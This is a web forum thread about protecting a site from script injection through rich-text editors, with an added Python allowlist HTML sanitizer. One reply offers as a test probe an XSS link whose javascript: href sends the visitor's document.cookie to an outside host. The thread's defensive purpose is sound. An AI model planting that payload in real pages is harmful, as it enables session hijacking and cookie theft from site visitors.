Hello,
I was reading web security stuff and found that users can inject malicious code, mostly JS, in forms. Now, what about CKFinder/TinyMCE et al? They obviously produce HTML, and any stripping will destroy the article formatting. Bad enough, they have a "code mode" where the user can enter HTML directly.
Suppose my system is compromised (which is security thinking), what guards can I put to ensure minimum damage?
Thanks :)
Stefano Mtangoo
455
Senior Poster
Recommended Answers
They *should* not allow inserting javascript, but always, try your best at inserting things like
<a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a>
if this ends up in your site, and the editor didn't block it, something is wrong.
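As an added example (not from this thread or any of its posters), a server-side allowlist sanitizer in Python that shows the guard the question asks for: it keeps the formatting tags a rich-text editor emits, drops every other tag and all event-handler attributes, and rejects javascript: hrefs such as the one quoted above. The tag and attribute allowlist and the function names are my assumptions, not any editor's or library's API.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: the formatting tags an editor like TinyMCE typically emits.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "u", "h1", "h2", "h3",
                "ul", "ol", "li", "blockquote", "pre", "code", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}  # no style=, no id=, never on*
SAFE_SCHEMES = {"http", "https", "mailto"}

def safe_url(url):
    # Browsers ignore embedded tabs/newlines and leading control characters,
    # so strip them before reading the scheme (catches "java\tscript:").
    scheme = urlparse(re.sub(r"[\x00-\x1f]", "", url).strip()).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif tag in ALLOWED_TAGS:
            kept = []
            for name, value in attrs:
                if name not in ALLOWED_ATTRS.get(tag, ()):
                    continue  # drops every on* handler, style=, etc.
                if name == "href" and not safe_url(value or ""):
                    continue  # the javascript: link quoted above is lost here
                kept.append(f' {name}="{html.escape(value or "")}"')
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:  # <script>/<style> bodies are discarded entirely
            self.out.append(html.escape(data, quote=False))

def sanitize(fragment):
    # Returns the editor's HTML with only allowlisted markup surviving.
    p = Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)
```

Run this on the stored article body, never only in the browser, since "code mode" and a direct POST bypass anything the editor does client-side.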
All 4 Replies
twiss
155
Veteran Poster
almostbob
866
Retired: passive income ROCKS
diafol